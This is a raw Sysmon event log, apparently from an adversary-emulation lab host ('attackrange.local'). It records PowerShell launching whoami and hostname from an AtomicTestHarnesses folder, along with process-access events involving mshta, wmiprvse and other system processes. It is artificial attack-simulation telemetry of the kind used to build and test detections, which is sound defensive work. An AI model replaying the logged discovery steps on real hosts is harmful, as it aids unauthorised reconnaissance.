16:01:19.050{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-53CF-6008-9806-00000000A301}8092C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028892Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.050{7901BC46-4FA9-6008-4305-00000000A301}74203768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53CF-6008-9806-00000000A301}8092C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a1632a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49622e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4960635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495f82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496043b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64) 154100x800000000000000028891Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.058{7901BC46-53CF-6008-9806-00000000A301}8092C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000028890Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.034{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53CF-6008-9706-00000000A301}4744C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028889Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.034{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028888Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.034{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028887Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.034{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028886Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.034{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028885Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.034{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-53CF-6008-9706-00000000A301}4744C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028884Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.034{7901BC46-4FA9-6008-4305-00000000A301}74203768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53CF-6008-9706-00000000A301}4744C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a1632a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49622e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4960635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495f82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496043b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64) 154100x800000000000000028883Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.039{7901BC46-53CF-6008-9706-00000000A301}4744C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000028930Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:20.753{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tlmhrsf3.awi.ps12021-01-20 16:01:20.753 10341000x800000000000000028929Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:20.706{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029041Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029040Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029039Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029038Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029037Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029036Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029035Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029034Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029033Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 